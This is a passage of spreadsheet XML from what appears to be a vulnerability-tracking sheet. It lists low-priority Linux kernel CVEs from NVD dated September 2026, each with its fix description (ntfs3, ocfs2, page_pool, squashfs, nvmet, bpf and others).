      <c r="B567" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C567" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90199</t>
        </is>
      </c>
      <c r="D567" s="5" t="inlineStr"/>
      <c r="E567" s="5" t="inlineStr"/>
      <c r="F567" s="5" t="inlineStr"/>
      <c r="G567" s="5" t="inlineStr"/>
      <c r="H567" s="5" t="inlineStr"/>
      <c r="I567" s="5" t="inlineStr"/>
      <c r="J567" s="5" t="inlineStr"/>
      <c r="K567" s="5" t="inlineStr"/>
      <c r="L567" s="5" t="inlineStr"/>
      <c r="M567" s="5" t="inlineStr"/>
      <c r="N567" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O567" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P567" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q567" s="5" t="inlineStr"/>
      <c r="R567" s="5" t="inlineStr"/>
      <c r="S567" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs/ntfs3: reject out-of-range evcn in mi_enum_attr()
In mi_enum_attr(), the start/end VCN validation for non-resident
attributes is:
	if (svcn &gt; evcn + 1) goto out;
When evcn is U64_MAX the "evcn + 1" expression wraps to 0 and any svcn
passes the check. For evcn values close to U64_MAX (but not equal to it)
the right-hand side is still a meaningless near-wrap upper bound, so a
malformed on-disk attribute with svcn == 0 and evcn near U64_MAX can pass
mi_enum_attr() unrejected.
VCN (virtual cluster number) is a cluster index, so any valid evcn is
bounded by the volume's total cluster count, which ntfs3 holds in
sbi-&gt;used.bitmap.nbits (set up in ntfs_init_from_boot() before any caller
of mi_enum_attr() runs). Reject evcn values that fall outside this range.
However, an empty non-resident attribute (no allocated clusters) is
legitimately encoded with svcn == 0 and evcn == -1 (U64_MAX), e.g. via
attr-&gt;nres.evcn = cpu_to_le64((u64)vcn - 1) with vcn == 0. That sentinel
must keep passing, so exclude evcn == U64_MAX from the range check. The
existing "svcn &gt; evcn + 1" test still tolerates the sentinel ("0 &gt; 0" is
false) and continues to require svcn == 0 for it, while the range check
rejects every other out-of-range evcn and thereby also defuses the
"evcn + 1" wraparound.
svcn does not need its own bound: once evcn &lt; nbits, "svcn &gt; evcn + 1"
implies svcn &lt;= nbits.
[almaz.alexandrovich@paragon-software.com: fixed evcn check]</t>
        </is>
      </c>
      <c r="T567" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90199</t>
        </is>
      </c>
    </row>
    <row r="568">
      <c r="A568" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B568" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C568" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90200</t>
        </is>
      </c>
      <c r="D568" s="5" t="inlineStr"/>
      <c r="E568" s="5" t="inlineStr"/>
      <c r="F568" s="5" t="inlineStr"/>
      <c r="G568" s="5" t="inlineStr"/>
      <c r="H568" s="5" t="inlineStr"/>
      <c r="I568" s="5" t="inlineStr"/>
      <c r="J568" s="5" t="inlineStr"/>
      <c r="K568" s="5" t="inlineStr"/>
      <c r="L568" s="5" t="inlineStr"/>
      <c r="M568" s="5" t="inlineStr"/>
      <c r="N568" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O568" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P568" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q568" s="5" t="inlineStr"/>
      <c r="R568" s="5" t="inlineStr"/>
      <c r="S568" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs/ntfs3: fix integer overflow in MFT cluster validation
In ntfs_init_from_boot(), the boot sector's MFT cluster numbers are
validated against the volume size with:
	if (mlcn  * sct_per_clst &gt;= sectors ||
	    mlcn2 * sct_per_clst &gt;= sectors)
		goto out;
mlcn and mlcn2 are u64 fields read directly from the boot sector.
sct_per_clst is bounded above by 4096 (true_sectors_per_clst() plus
the is_power_of_2() check below it), but the multiplication is done
in u64 and wraps when mlcn (or mlcn2) is large enough -- e.g. mlcn
near 2^62 with sct_per_clst == 4 wraps to 0, which compares below
any non-zero 'sectors', so the check is bypassed and the malformed
record is accepted.
The accepted mlcn is then used unchanged in
	sbi-&gt;mft.lbo = mlcn &lt;&lt; cluster_bits;
In practice the resulting reads fail at the block layer (sb_bread()
returns NULL via grow_buffers()'s check_mul_overflow() guard), so
today this manifests as mount failing in odd places rather than as
something more dangerous, but the validation step is still wrong
and there is no reason for callers to rely on the block layer to
catch a value that should never have been accepted in the first
place.
Use check_mul_overflow() to compute the two sector positions and
fail the mount if either multiplication wraps; this preserves the
existing semantics (mlcn * sct_per_clst &gt;= sectors) instead of
switching to division (mlcn &gt;= sectors / sct_per_clst), which
would tighten the check at edge cases where 'sectors' is not a
multiple of sct_per_clst.  The check_*_overflow() style is the
one ntfs3 already uses for similar on-disk arithmetic in
fs/ntfs3/run.c.</t>
        </is>
      </c>
      <c r="T568" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90200</t>
        </is>
      </c>
    </row>
    <row r="569">
      <c r="A569" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B569" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C569" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90201</t>
        </is>
      </c>
      <c r="D569" s="5" t="inlineStr"/>
      <c r="E569" s="5" t="inlineStr"/>
      <c r="F569" s="5" t="inlineStr"/>
      <c r="G569" s="5" t="inlineStr"/>
      <c r="H569" s="5" t="inlineStr"/>
      <c r="I569" s="5" t="inlineStr"/>
      <c r="J569" s="5" t="inlineStr"/>
      <c r="K569" s="5" t="inlineStr"/>
      <c r="L569" s="5" t="inlineStr"/>
      <c r="M569" s="5" t="inlineStr"/>
      <c r="N569" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O569" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P569" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q569" s="5" t="inlineStr"/>
      <c r="R569" s="5" t="inlineStr"/>
      <c r="S569" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: page_pool: fix UAF in __page_pool_release_netmem_dma on xa_cmpxchg race
This bug was discovered while testing the hns3 driver under channel
reconfiguration (`ethtool -L` / `ethtool -G`) with iperf3 traffic on
arm64. The race is intermittently triggered when page_pool_destroy()
runs page_pool_scrub() concurrently with page return via
page_pool_put_netmem() on a different CPU. A WARN in
page_pool_clear_pp_info() surfaced the dangling DMA index bits left
by the cmpxchg loser, which led to the investigation.
page_pool_scrub() iterates pool-&gt;dma_mapped via xa_for_each() with no
page ref held. __page_pool_release_netmem_dma() currently reads and
writes netmem fields (dma_addr, DMA index bits in pp_magic) after
xa_cmpxchg() returns. The unref path calls put_page() unconditionally
regardless of the cmpxchg outcome; when it loses the cmpxchg, it still
frees the page before the scrub winner finishes these netmem accesses,
so scrub touches a freed page -- a Use-After-Free.
Fix this by splitting the DMA release into two functions:
1. __page_pool_unmap_netmem_dma() caches dma_addr before xa_cmpxchg(),
   does the cmpxchg to remove the DMA mapping, and calls dma_unmap on
   the cached address. It never touches netmem fields after the cmpxchg,
   making it safe for the scrub path which holds no page ref.
2. __page_pool_release_netmem_dma() wraps the above and additionally
   clears dma_addr and DMA index bits in netmem fields. This is safe
   only when the caller holds a page ref, so it is used by the return
   path (page_pool_return_netmem).
The scrub path calls __page_pool_unmap_netmem_dma() directly; the return
path calls __page_pool_release_netmem_dma().</t>
        </is>
      </c>
      <c r="T569" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90201</t>
        </is>
      </c>
    </row>
    <row r="570">
      <c r="A570" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B570" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C570" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90202</t>
        </is>
      </c>
      <c r="D570" s="5" t="inlineStr"/>
      <c r="E570" s="5" t="inlineStr"/>
      <c r="F570" s="5" t="inlineStr"/>
      <c r="G570" s="5" t="inlineStr"/>
      <c r="H570" s="5" t="inlineStr"/>
      <c r="I570" s="5" t="inlineStr"/>
      <c r="J570" s="5" t="inlineStr"/>
      <c r="K570" s="5" t="inlineStr"/>
      <c r="L570" s="5" t="inlineStr"/>
      <c r="M570" s="5" t="inlineStr"/>
      <c r="N570" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O570" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P570" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q570" s="5" t="inlineStr"/>
      <c r="R570" s="5" t="inlineStr"/>
      <c r="S570" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: mpt3sas: Avoid freeing unallocated PCIe SGL buffers
_base_release_memory_pools() unconditionally frees every
ioc-&gt;pcie_sg_lookup[] entry, including ones the setup loop never
allocated after a partial failure, causing a "bad dma" warning on debug
kernels or a NULL pointer dereference otherwise.</t>
        </is>
      </c>
      <c r="T570" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90202</t>
        </is>
      </c>
    </row>
    <row r="571">
      <c r="A571" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B571" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C571" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90203</t>
        </is>
      </c>
      <c r="D571" s="5" t="inlineStr"/>
      <c r="E571" s="5" t="inlineStr"/>
      <c r="F571" s="5" t="inlineStr"/>
      <c r="G571" s="5" t="inlineStr"/>
      <c r="H571" s="5" t="inlineStr"/>
      <c r="I571" s="5" t="inlineStr"/>
      <c r="J571" s="5" t="inlineStr"/>
      <c r="K571" s="5" t="inlineStr"/>
      <c r="L571" s="5" t="inlineStr"/>
      <c r="M571" s="5" t="inlineStr"/>
      <c r="N571" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O571" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P571" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q571" s="5" t="inlineStr"/>
      <c r="R571" s="5" t="inlineStr"/>
      <c r="S571" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Squashfs: check block offset is not negative
If a negative offset is read off disk (for example the offset into the
decompressed fragment block), this will cause squashfs_copy_data() to
perform an out of bounds access.
Fix by checking if offset is negative, and returning 0.  This matches
existing behaviour where an offset beyond the block returns 0 bytes
copied.
To trigger this out of bounds access requires a crafted Squashfs
filesystem and CAP_SYS_ADMIN to mount it.  Unprivileged users will not be
able to mount such a filesystem, but once mounted, an unprivileged user
can trigger the out of bounds access by reading the crafted file with the
negative offset.</t>
        </is>
      </c>
      <c r="T571" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90203</t>
        </is>
      </c>
    </row>
    <row r="572">
      <c r="A572" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B572" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C572" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90204</t>
        </is>
      </c>
      <c r="D572" s="5" t="inlineStr"/>
      <c r="E572" s="5" t="inlineStr"/>
      <c r="F572" s="5" t="inlineStr"/>
      <c r="G572" s="5" t="inlineStr"/>
      <c r="H572" s="5" t="inlineStr"/>
      <c r="I572" s="5" t="inlineStr"/>
      <c r="J572" s="5" t="inlineStr"/>
      <c r="K572" s="5" t="inlineStr"/>
      <c r="L572" s="5" t="inlineStr"/>
      <c r="M572" s="5" t="inlineStr"/>
      <c r="N572" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O572" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P572" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q572" s="5" t="inlineStr"/>
      <c r="R572" s="5" t="inlineStr"/>
      <c r="S572" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ocfs2: validate DIO orphan slot during inode read
[BUG]
A corrupted append-DIO dinode (high byte at offset 0xa1
corrupted from 0 to 1) can carry an i_dio_orphaned_slot
outside the mounted filesystem slot range and trigger a
use-after-free error:
BUG: KASAN: slab-use-after-free in ocfs2_get_system_file_inode+0x780/0x820 fs/ocfs2/sysfile.c:102
Read of size 8 at addr ffff88800b767c00 by task kworker/u8:3/85
Call Trace:
 ...
 ocfs2_get_system_file_inode+0x780/0x820 fs/ocfs2/sysfile.c:102
 ocfs2_wipe_inode+0x292/0xf70 fs/ocfs2/inode.c:840
 ocfs2_delete_inode fs/ocfs2/inode.c:1155 [inline]
 ocfs2_evict_inode+0x6c9/0x1170 fs/ocfs2/inode.c:1295
 evict+0x38e/0x8f0 fs/inode.c:810
 iput_final fs/inode.c:1914 [inline]
 iput fs/inode.c:1966 [inline]
 iput+0x55b/0x8b0 fs/inode.c:1926
 ocfs2_recover_orphans+0x610/0xe40 fs/ocfs2/journal.c:2374
 ocfs2_complete_recovery+0x5af/0xd00 fs/ocfs2/journal.c:1373
 ...
[CAUSE]
ocfs2_del_inode_from_orphan() uses i_dio_orphaned_slot to index the
slot-local system inode cache. The dinode validator does not check
this active slot, so an out-of-range value produces an invalid cache
entry pointer that is dereferenced as an inode pointer.
[FIX]
Reject an active i_dio_orphaned_slot outside the slot range during
dinode validation, before DIO orphan recovery can consume it.</t>
        </is>
      </c>
      <c r="T572" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90204</t>
        </is>
      </c>
    </row>
    <row r="573">
      <c r="A573" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B573" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C573" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90205</t>
        </is>
      </c>
      <c r="D573" s="5" t="inlineStr"/>
      <c r="E573" s="5" t="inlineStr"/>
      <c r="F573" s="5" t="inlineStr"/>
      <c r="G573" s="5" t="inlineStr"/>
      <c r="H573" s="5" t="inlineStr"/>
      <c r="I573" s="5" t="inlineStr"/>
      <c r="J573" s="5" t="inlineStr"/>
      <c r="K573" s="5" t="inlineStr"/>
      <c r="L573" s="5" t="inlineStr"/>
      <c r="M573" s="5" t="inlineStr"/>
      <c r="N573" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O573" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P573" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q573" s="5" t="inlineStr"/>
      <c r="R573" s="5" t="inlineStr"/>
      <c r="S573" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ocfs2: validate orphan slot during inode read
Patch series "ocfs2: validate active orphan slots during inode read".
OCFS2 trusts active ordinary and append-DIO orphan slots read from dinodes.
A corrupted slot can therefore index osb_orphan_wipes or the slot-local
system-inode cache outside their allocations before the corruption is
reported.
Patch 1 validates the ordinary orphan slot used by inode wipe processing.
Patch 2 validates the append-DIO orphan slot used by DIO completion and
orphan recovery.  Both checks reject corrupt metadata at the existing inode
validation boundary.
This patch (of 2):
[BUG]
A corrupted dinode with OCFS2_ORPHANED_FL can carry an
i_orphaned_slot outside the mounted filesystem slot range.
ocfs2_wipe_inode() uses it to index osb_orphan_wipes before looking
up the orphan directory, causing an out-of-bounds memory access.
BUG: KASAN: slab-use-after-free in ocfs2_get_system_file_inode+0x780/0x820 fs/ocfs2/sysfile.c:102
Read of size 8 at addr ffff88800b767c00 by task kworker/u8:3/85
Call Trace:
 ...
 ocfs2_get_system_file_inode+0x780/0x820 fs/ocfs2/sysfile.c:102
 ocfs2_wipe_inode+0x292/0xf70 fs/ocfs2/inode.c:840
 ocfs2_delete_inode fs/ocfs2/inode.c:1155 [inline]
 ocfs2_evict_inode+0x6c9/0x1170 fs/ocfs2/inode.c:1295
 evict+0x38e/0x8f0 fs/inode.c:810
 iput_final fs/inode.c:1914 [inline]
 iput fs/inode.c:1966 [inline]
 iput+0x55b/0x8b0 fs/inode.c:1926
 ocfs2_recover_orphans+0x610/0xe40 fs/ocfs2/journal.c:2374
 ocfs2_complete_recovery+0x5af/0xd00 fs/ocfs2/journal.c:1373
 ...
[CAUSE]
ocfs2_validate_inode_block() validates i_suballoc_slot but leaves
the active ordinary orphan slot unchecked. Downstream consumers
assume that the value is smaller than osb-&gt;max_slots.
[FIX]
Reject an active i_orphaned_slot outside the slot range during
dinode validation, before the inode reaches orphan wipe processing.</t>
        </is>
      </c>
      <c r="T573" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90205</t>
        </is>
      </c>
    </row>
    <row r="574">
      <c r="A574" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B574" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C574" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90206</t>
        </is>
      </c>
      <c r="D574" s="5" t="inlineStr"/>
      <c r="E574" s="5" t="inlineStr"/>
      <c r="F574" s="5" t="inlineStr"/>
      <c r="G574" s="5" t="inlineStr"/>
      <c r="H574" s="5" t="inlineStr"/>
      <c r="I574" s="5" t="inlineStr"/>
      <c r="J574" s="5" t="inlineStr"/>
      <c r="K574" s="5" t="inlineStr"/>
      <c r="L574" s="5" t="inlineStr"/>
      <c r="M574" s="5" t="inlineStr"/>
      <c r="N574" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O574" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P574" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q574" s="5" t="inlineStr"/>
      <c r="R574" s="5" t="inlineStr"/>
      <c r="S574" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvmet: fix max_qid race between configfs and controller allocation
The function nvmet_subsys_attr_qid_max_store() can race against
nvmet_alloc_ctrl() when a subsystem's max_qid limit is modified.
Suppose max_qid is currently 64. If nvmet_alloc_ctrl() executes:
ctrl-&gt;sqs = kzalloc_objs(struct nvmet_sq *, subsys-&gt;max_qid + 1);
and at this exact point, a userspace process changes max_qid to 128,
nvmet_subsys_attr_qid_max_store() will set the new max_qid value. It
attempts to delete active controllers to force a reconnect, but the
new controller won't be deleted because it hasn't been added to the
subsys-&gt;ctrls list yet.
nvmet_alloc_ctrl() then proceeds and adds the new controller to the
subsys-&gt;ctrls list. Later, when nvmet_install_queue() is called, it
will see max_qid set to 128, but the memory allocated for sqs is only
sized for 64 entries. This results in a KASAN out-of-bounds warning
and potential memory corruptions.
Fix this by protecting the queue allocations and list insertion in
nvmet_alloc_ctrl() with down_read(&amp;nvmet_config_sem). Because
nvmet_subsys_attr_qid_max_store() acquires down_write(&amp;nvmet_config_sem)
to modify the attribute, this safely prevents the configfs writer from
modifying max_qid during controller creation.
Copy the max_qid from the subsystem to the controller's structure
during the allocation; ctrl-&gt;max_qid never changes as long as the
controller remains in LIVE state, so this will prevent similar race
conditions.</t>
        </is>
      </c>
      <c r="T574" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90206</t>
        </is>
      </c>
    </row>
    <row r="575">
      <c r="A575" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B575" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C575" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90207</t>
        </is>
      </c>
      <c r="D575" s="5" t="inlineStr"/>
      <c r="E575" s="5" t="inlineStr"/>
      <c r="F575" s="5" t="inlineStr"/>
      <c r="G575" s="5" t="inlineStr"/>
      <c r="H575" s="5" t="inlineStr"/>
      <c r="I575" s="5" t="inlineStr"/>
      <c r="J575" s="5" t="inlineStr"/>
      <c r="K575" s="5" t="inlineStr"/>
      <c r="L575" s="5" t="inlineStr"/>
      <c r="M575" s="5" t="inlineStr"/>
      <c r="N575" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O575" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P575" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q575" s="5" t="inlineStr"/>
      <c r="R575" s="5" t="inlineStr"/>
      <c r="S575" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: seq: midi: Serialize input teardown with event_input
snd_midi_input_event() must not be running while a rawmidi substream is
closing, since this can lead to the trigger state becoming out-of-step
through this sequence in snd_rawmidi_input_trigger():
	snd_rawmidi_input_trigger(up=0)
					snd_midi_input_event()
					 -&gt; snd_rawmidi_kernel_read()
					     -&gt; snd_rawmidi_input_trigger(up=1)
	  -&gt; cancel_work_sync()
which ends with the underlying device being active unexpectedly.
When this is called from close_substream(), further input can re-trigger
the input event leaving it running after rawmidi_release_priv() has set
rfile-&gt;rmidi to NULL which leads to:
	Unable to handle kernel NULL pointer dereference at virtual address 00000000000000b0
	Call trace:
	 snd_midi_input_event+0x3c/0x134 [snd_seq_midi] (P)
	 snd_rawmidi_input_event_work+0x1c/0x2c
	 process_one_work+0x150/0x3a4
	 worker_thread+0x190/0x318
Apply a similar approach to commit ef7607ab1c8ad ("ALSA: seq: midi:
Serialize output teardown with event_input") which fixed the same issue
in the output direction, but updated to use RCU following Takashi Iwai's
proposed follow-on patch [1].
With this change in place, midisynth_unsubscribe() clears the input file
so snd_midi_input_event() will not re-trigger the stream and will be
quiesced by the cancel_work_sync() in snd_rawmidi_input_trigger().
[1] https://lore.kernel.org/linux-sound/20260813144224.753399-1-tiwai@suse.de/</t>
        </is>
      </c>
      <c r="T575" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90207</t>
        </is>
      </c>
    </row>
    <row r="576">
      <c r="A576" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B576" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C576" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90208</t>
        </is>
      </c>
      <c r="D576" s="5" t="inlineStr"/>
      <c r="E576" s="5" t="inlineStr"/>
      <c r="F576" s="5" t="inlineStr"/>
      <c r="G576" s="5" t="inlineStr"/>
      <c r="H576" s="5" t="inlineStr"/>
      <c r="I576" s="5" t="inlineStr"/>
      <c r="J576" s="5" t="inlineStr"/>
      <c r="K576" s="5" t="inlineStr"/>
      <c r="L576" s="5" t="inlineStr"/>
      <c r="M576" s="5" t="inlineStr"/>
      <c r="N576" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O576" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P576" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q576" s="5" t="inlineStr"/>
      <c r="R576" s="5" t="inlineStr"/>
      <c r="S576" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
clocksource/drivers/samsung_pwm: Switch to raw_spinlock_t type
Samsung PWM timer might be used as a clock source on some legacy systems.
When PREEMPT_RT is enabled on ARM, regular spinlock is converted to a
sleeping lock (mutex-based), which must not be used in atomic context
such as hard interrupt handlers. Switch the samsung_pwm_lock to the
raw_spinlock, which remains a true non-sleeping spinlock even
under PREEMPT_RT.</t>
        </is>
      </c>
      <c r="T576" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90208</t>
        </is>
      </c>
    </row>
    <row r="577">
      <c r="A577" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B577" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C577" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90209</t>
        </is>
      </c>
      <c r="D577" s="5" t="inlineStr"/>
      <c r="E577" s="5" t="inlineStr"/>
      <c r="F577" s="5" t="inlineStr"/>
      <c r="G577" s="5" t="inlineStr"/>
      <c r="H577" s="5" t="inlineStr"/>
      <c r="I577" s="5" t="inlineStr"/>
      <c r="J577" s="5" t="inlineStr"/>
      <c r="K577" s="5" t="inlineStr"/>
      <c r="L577" s="5" t="inlineStr"/>
      <c r="M577" s="5" t="inlineStr"/>
      <c r="N577" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O577" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P577" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q577" s="5" t="inlineStr"/>
      <c r="R577" s="5" t="inlineStr"/>
      <c r="S577" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/debug: Fix deadlock during unregister
Unregistering an s390dbf debug area while one of the associated debugfs
files is being written to can cause a deadlock:
$ echo &gt;.../vmur/level    $ rmmod vmur
===================================================
debugfs write
debugfs_file_get()
                          debug_unregister()
                          mutex_lock(debug_mutex)
                          debugfs_remove()
                          wait for debugfs_file_put()
debug_file_ops.write()
debug_input()
mutex_lock(debug_mutex) ==&gt; DEADLOCK
Fix this by splitting debug_unregister() into an s390dbf and debugfs
part, and running only the s390dbf part with debug_mutex locked.</t>
        </is>
      </c>
      <c r="T577" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90209</t>
        </is>
      </c>
    </row>
    <row r="578">
      <c r="A578" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B578" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C578" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90210</t>
        </is>
      </c>
      <c r="D578" s="5" t="inlineStr"/>
      <c r="E578" s="5" t="inlineStr"/>
      <c r="F578" s="5" t="inlineStr"/>
      <c r="G578" s="5" t="inlineStr"/>
      <c r="H578" s="5" t="inlineStr"/>
      <c r="I578" s="5" t="inlineStr"/>
      <c r="J578" s="5" t="inlineStr"/>
      <c r="K578" s="5" t="inlineStr"/>
      <c r="L578" s="5" t="inlineStr"/>
      <c r="M578" s="5" t="inlineStr"/>
      <c r="N578" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O578" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P578" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q578" s="5" t="inlineStr"/>
      <c r="R578" s="5" t="inlineStr"/>
      <c r="S578" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix UAF in bpf_trampoline_multi_attach_free on update failure
When bpf_trampoline_update() fails before modify_fentry_multi()/
unregister_fentry_multi() is called, cur_image is unchanged
(cur_image == old_image) and ftrace still calls into it.  Freeing
old_image in that case causes a UAF.
Only free old_image when it differs from cur_image.</t>
        </is>
      </c>
      <c r="T578" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90210</t>
        </is>
      </c>
    </row>
    <row r="579">
      <c r="A579" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B579" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C579" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90211</t>
        </is>
      </c>
      <c r="D579" s="5" t="inlineStr"/>
      <c r="E579" s="5" t="inlineStr"/>
      <c r="F579" s="5" t="inlineStr"/>
      <c r="G579" s="5" t="inlineStr"/>
      <c r="H579" s="5" t="inlineStr"/>
      <c r="I579" s="5" t="inlineStr"/>
      <c r="J579" s="5" t="inlineStr"/>
      <c r="K579" s="5" t="inlineStr"/>
      <c r="L579" s="5" t="inlineStr"/>
      <c r="M579" s="5" t="inlineStr"/>
      <c r="N579" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O579" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P579" s="5" t="inlineStr">
        <is>
